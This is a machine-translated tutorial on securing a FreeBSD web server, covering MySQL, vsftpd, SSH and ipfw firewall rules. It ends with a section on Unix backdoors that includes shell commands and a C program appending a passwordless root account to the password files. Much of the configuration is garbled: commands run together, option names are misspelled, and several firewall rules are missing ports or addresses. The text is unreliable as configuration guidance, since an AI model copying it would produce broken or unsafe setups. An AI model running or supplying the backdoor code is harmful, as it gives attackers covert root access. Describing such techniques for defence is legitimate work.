Building secure Web servers under FreeBSD (3)

Web|web Service |web Server | Security for interacting with PHP scripts, it's best to create a user with permissions such as update, select, delete, insert, drop table, create TABLE, etc. for a library. This will be a good way to avoid the minimum loss of database username and password after being viewed by hackers.
For example, let's create a database for DB1, and build a user test1 to access the database.
mysql> CREATE DATABASE db1;
Mysql> Grant Select,insert,update,delete,create,drop privileges on db1.* to test1@localhost identified by ' AdminDB ';
The above SQL is to create a database db1, while adding a test1 user, password is admindb, but it only from the local connection MySQL, DB1 Library has select,insert,update,delete,create,drop operation permissions.
(7) Restricting the average user from browsing to other user databases
If you have more than one database, each database has a user, you must limit the user to browse other database content, you can start the MySQL server with the--skip-show-database boot parameters can achieve the goal.
(8) Forget the MySQL password solution
If you inadvertently forget the MySQL root password, we can start the MySQL server with the parameter--skip-grant-tables to skip authorization table verification (./safe_mysqld--skip-grant-tables &), So we can go directly to the MySQL server, and then modify the root user password, restart MySQL can be used to login with the new password.
(9) Security of database files
Our default MySQL is installed in the/usr/local/mysql directory, then the corresponding database file is in the/usr/local/mysql/var directory, then we have to ensure that the directory can not allow unauthorized users to access the database after the package copy away, So restrict access to the directory.
We modify the directory to which the users and groups are MySQL, while changing access rights:
# Chown-r Mysql.mysql/usr/local/mysql/var
# Chmod-r Go-rwx/usr/local/mysql/var
(10) Delete historical records
Execution of the above commands will be recorded in the history file by the shell, such as bash writing to the user directory's. bash_history file, if the files are inadvertently read, then the database password will leak. SQL commands executed after the user logs in to the database are also recorded in the user directory's. mysql_history file by MySQL. If a database user modifies the database password with an SQL statement, it is also compromised by the. mysql_history file. So we in the shell landing and backup when not directly after-p password, but in the prompt and then enter the database password.
In addition to these two files we should also not let it record our operation, just in case.
# rm. bash_history. mysql_history
# ln-s/dev/null. bash_history
# ln-s/dev/null. mysql_history
(11) Other
In addition, you can also consider the use of chroot and other ways to control the running directory of MySQL, better control permissions, specific reference to the relevant articles.

4. VSFTPD Security Settings
VSFTPD is a very famous FTP Daemon program, currently including redhat.com, many large companies are in use, it is a very safe program, because its name is called: Very Secure FTP Daemon (very secure FTP server).
VSFTPD SET options are more, involved in all aspects, we are mainly in the following security settings.
At present, our demand is to use the System account also as our FTP account to carry out the management of our files, now assume that I only need an account to update my site, and I do not want the account to be able to log into our system, such as the directory of our site is under/usr/www, So we create a new user FTP, its home directory is/usr/www, and its shell is/usr/sbin/nologin, there is no shell, to prevent the user through SSH and other landing to the system.
The following is a system-specific setting, mainly for VSFTPD configuration files vsftpd.conf file configuration.
(1) Prohibit anonymous user access, we do not need any anonymous users, directly prohibited:
Anonymous_enable=no
(2) Allow local users to log in, because we need to use FTP users to manage our site:
Local_enable=yes
(3) Only allow FTP users in the system or certain designated users access to FTP, because the system has a large number of accounts, it is impossible for anyone to access.
To open the User file List feature:
Userlist_enable=yes
Allow only users in the user files list to access ftp:
Userlist_deny=no
User name file list path:
Userlist_file=/etc/vsftpd.user_list
Then create a file Vsftpd.user_list file in/etc, one line, add the user FTP, but also add the system account name you allow access to.
(4) Prohibit certain users from landing ftp:
Pam_service_name=vsftpd
Indicates the PAM profile name used by VSFTPD for PAM authentication, the default is VSFTPD, and the default Pam profile is/etc/pam.d/vsftpd.
/etc/vsftpd.ftpusers
VSFTPD prevents users in this file from logging on to the FTP server, which is a single line of user names. This mechanism is set by default in/ETC/PAM.D/VSFTPD.
This function is a bit like the one in (3), and they can be used in combination, which is best.
(5) The local user locked in their own home directory, to prevent the transfer to other directories, such as the/etc/passwd to download:
Chroot_local_users=no
Chroot_list_enable=yes
Chroot_list_file=/etc/vsftpd.chroot_list
Then create a vsftpd.chroot_list file under/etc, which adds the local account we want to restrict, one line, and we add FTP to prevent it from landing on the system.
(6) Hide the file real all user and group information, prevent hackers to take FTP after viewing more system user information:
Hide_ids=yes
(7) Cancel the Ls-r command and save resources because using this command will waste a lot of system resources when the list of files is large:
Ls_recurse_enable=no
(8) The default permissions for uploading files, set to 022:
local_umask=022
If you want to overwrite the deletion and so on, also open:
Write_enable=yes
(9) FTP banner information, in order to prevent hackers to obtain more information on the server, set this item:
Ftpd_banner=banner string
Set the following banner string to the banner prompt you need, and for security, do not recommend exposing any information about VSFTPD.
In addition, if you have more information, you can set the hint to read the information in a file:
Banner_file=/directory/vsftpd_banner_file
(10) Turn on log function:
Xferlog_enable=yes
Set the directory for the log at the same time:
Xferlog_file=/var/log/vsftpd.log
To enable verbose logging format:
Xferlog_enable=yes
(11) If the virtual user function is turned on, it is recommended to close the local user login:
Local_enable=no

VSFTPD also has a lot of security settings, after all, people's name is: Very secure FTP Daemon, anyway, it's an overflow of what is very little, if you want to be more secure, the proposal according to their own needs to set the VSFTPD, set the good, it is absolutely the safest.

5. SSH Security Settings
SSH is a secure connection based on SSL remote management of the service program, mainly in order to solve the process of Telnet, rlogin, rsh, and other programs in the program interaction between the existence of clear text transmission is easy to listen to the problem, is basically recommended to use SSH instead of Telnet, Rlogin, RSH and other remote management services.
SSH can be directly under the Windows platform through the secure SSH client Tools for connection management, the most popular server side is the OPENSSH program, The latest version is the OpenSSH4.0 version, the details can refer to the Www.openssh.com website.
OpenSSH under FreeBSD has been installed, FreeBSD5.3 under the OpenSSH version is 3.8.1, recommended ports upgrade to 4.0.

The main security profile is the/etc/ssh/sshd_config file, and we edit the file.
(1) The use of Protocol 2 to replace protocol 1,SSH2 is more secure, preventing attackers from hijacking (hijacking) the process of initiating a session by modifying the carrying version banner and lowering it to protocol 1. Comment out protocol 2,1 instead by using the following statement:
Protocol 2
(2) Reasonable set the maximum number of connections to prevent Dos attacks
Maxstartups 5:50:10
(3) Close x11forwording to prevent session hijacking
X11forwarding No

(4) Do not recommend the use of static passwords, and the use of DSA or RSA KEY, modify the following to turn off the use of password authentication:
Passwordauthentication No
(5) can restrict a group or light individual user access to the shell
Allowgroups Wheel
Or
Allowusers Heiyeluren
(6) Limit root user landing, mainly to prevent brute force
Permitrootlogin No
(7) Users who do not allow passwords to be empty are logged in

Permitemptypasswords No
(8) Use TCP wrappers to restrict some access, modify/etc/hosts.allow file, comment out "ALL:ALL:allow", add the following content:
Sshd:localhost:allow
Sshd:friendlcomputer:allow
Sshd:all:deny
#相关命令:
#chsh-S/sbin/nologin user

Iv. installation and setup of firewalls
FreeBSD with a packet-filtered firewall--ipfw, although the function is not as strong as a professional firewall, but to deal with the security of a Web site is enough, so we decided to use the firewall to protect our web server.

1. Install IPFW
The main part of the IPFW is running in the kernel, so you will need to add some of the options in the FreeBSD kernel configuration file. (Note that if you do not install the FreeBSD core source code, you will not be able to enter the following directory, so before running must install the kernel source code) First we enter the kernel configuration file:
# cd/sys/i386/conf
# CP GENERIC./KERNEL_FW
To open the kernel configuration file:
# EE./kernel_fw
Add four options and do not need the following comment information:
Options Ipfirewall # To compile the code of the Packet filtering section into the kernel.
Options Ipfirewall_verbose
# Enable logs logged through SYSLOGD. If this option is not specified, even if you specify a record package in the filter rule, they are not actually logged
Options ipfirewall_verbose_limit=10
# limit the number of record bars per package rule recorded by SYSLOGD (8). This option can be useful in harsh environments if you want to record the activity of a firewall without a denial of service attack due to syslog flood records.
Options Ipfirewall_default_to_accept
# This will change the default rule action from ' deny ' to ' allow '. This prevents you from locking yourself out before you configure a firewall to use a ipfirewall-enabled kernel reboot. In addition, it is also useful if you frequently use IPFW (8) to solve some problems. However, you should be careful when you use it, as this will open the firewall and change its behavior.

To compile the kernel:
#/usr/sbin/config KERNEL_FW
# CD ... /COMPILE/KERNEL_FW (Note your version, if the version below 5.0 is used.) /.. /COMPILE/KERNEL_FW)
# make Depend
# make
# make Install
Reboot the system. Note that we have not selected options ipfirewall_default_to_accept this option, which means that the default system is turned on after the firewall is started, and the firewall defaults to not allow any connections (deny from "any"), So be sure to operate locally, otherwise you will be "locked out", and if you choose this option you can use SSH and other connections not affected, but this is relatively unsafe.

2. Configure IPFW
If you configure regular rules, use the mode configured by the command:
IPFW configuration command: IPFW [-n] command [numbering] action [log] protocol address [other options]
For example:
# IPFW add allow TCP from No to 10.10.10.1 #允许外界访问我的web服务
# IPFW add allow TCP from No to 10.10.10.1 #允许外面访问我的ftp服务
# IPFW add allow TCP from ' to 10.10.10.1 #允许外界访问我的ssh服务
If you use the form of a rule pack, look at the following.
After the system starts, we also need to configure the rc.conf file to run our firewall:
# ee/etc/rc.conf
Add the following content:
Gateway_enable= "YES" # Start Gateway
Firewall_enable= "YES" # Activates firewall firewall
Firewall_script= "/etc/rc.firewall" # Firewall firewall default script
Firewall_type= "/etc/ipfw.conf" # Firewall Custom Script
Firewall_quiet= "NO" # Displays rule information when scripting. Now for "NO" If your firewall script is already set, you can put this here to "YES".
Firewall_logging_enable= "YES" to enable firewall log records.
After the setup is complete, we'll edit the/etc/syslog.conf file:
# ee/etc/syslog.conf
Add the following line:
!ipfw
*.*/var/log/ipfw.log
Now to the most important editing rule pack:
# ee/etc/ipfw.conf
We add the rules: (Note that 10.10.10.1 is the IP of our server)
######### TCP ##########
Add 00001 Deny log IP from the any ipopt RR
Add 00002 Deny log IP from all to any ipopt TS
Add 00003 Deny log IP from all ipopt SSRR
Add 00004 Deny log IP from all ipopt LSRR
Add 00005 deny TCP Tcpflags Syn,fin
# These 5 lines are filtered by a variety of scan packs
Add 10001 allow TCP from all to 10.10.10.1 open the HTTP service to the entire Internet.
Add 10002 allow TCP from all to 10.10.10.1 open the FTP service to the entire Internet.
Add 10000 allow TCP from 1.2.3.4 to 10.10.10.1
# xx.xx.xx.xx This IP open SSH service to the Internet. That is, only trust this IP SSH login.
# If your login server's IP is not fixed, then set to: Add 10000 allow TCP/10.10.10.1 in
Add 19997 check-state
Add 19998 allow TCP from No to any out keep-state setup
Add 19999 allow TCP from either to no out #这三个组合起来是允许内部网络访问出去, you can remove 19997 and 19998 if you want the server to not go out with the Internet for TCP connections. (Does not affect server access to the Internet)
########## UDP ##########
Add 20001 allow UDP to 10.10.10.1 # allows information from other DNS servers to enter the server because of DNS resolution.
The add 29999 allow UDP from the any and all out # allows its own UDP packets to be sent out.
########## ICMP #########
Add 30000 allow ICMP from all to Icmptypes 3
Add 30001 allow ICMP from all to Icmptypes 4
Add 30002 allow ICMP from all to any icmptypes 8 out
Add 30003 allow ICMP from the any icmptypes 0 in
Add 30004 allow ICMP from all to Icmptypes
#允许自己ping别人的服务器. also allows the internal network to use the router command for route tracking.

The backdoor technology and precaution on the Unix/linux
For hackers, the invasion of a system is only the beginning of the long march, the most important is the long-term possession of a broiler (puppet machine), so, backdoor technology is often of great importance. For us, always in a passive position, hundred a sparse, there is always no place to do in place, who can not guarantee their system is absolutely safe, so we can not avoid the possibility of intrusion. The hacker will definitely leave the back door after the invasion, of course, in addition to those masters, the realm is very high, the invasion is only for testing or technical challenges, for the general hacker, after the invasion to leave behind a backdoor is very important, we have to guard against, of course, we must understand the commonly used backdoor technology, the following simple talk will be in unix/ The more common backdoor technology in Linux systems.
1. Account Back Door
The most common and original backdoor technique is to add an administrator account to the system.
# echo "Heiyeluren:*:0:0::/root:/bin/sh" >>/etc/passwd
# echo "Heiyeluren::0:0::0:0::/root:/bin/sh" >>/etc/shadow
Add a UID and GID 0 (root) account to the system without a password.
FreeBSD's password is stored in the/ETC/MASTER.PASSWD, then the following command should be changed to:
# echo "Heiyeluren::::::::" >>/etc/master.passwd
You can also use programs to implement:
/* ADD Super User * *
#include "stdio.h"
#define Passwd_path "/etc/passwd"
#define Shadow_path "/ETC/MASTER.PASSWD"
Main ()
{
FILE *FD;
FD = fopen (Passwd_path, "A +");
fprintf (FD, "heiyeluren:*:0:0::/root:/bin/sh\n");
Fclose (FD);
FD = fopen (Shadow_path, "A +");
fprintf (FD, "heiyeluren::0:0::0:0::/root:/bin/sh\n");
Fclose (FD);
}
# Gcc-o AddUser adduser.c
#./adduser
This method is relatively silly, generally easier to find, especially when the system account is not much. Also some user name from the more confusing people, such as starting a r00t username, uid and GID are 0, so if not pay attention, may be fooled.
* Precautionary Method:
Although this method is relatively easy to find, but we still have to guard against, to pay more attention to observe the system's account situation, our system account is not much, check up more convenient, also pay attention to those less use of the account is not changed, such as the default account has bind, its shell is/usr/ Sbin/nologin, is not landing, but the hacker after the invasion changed it, such as to/BIN/CSH, then the other side can land, but you do not know. So the best way is to put the/etc/passwd another copy, irregular inspection, while the/etc/passwd and/etc/master.passwd set as only root to view.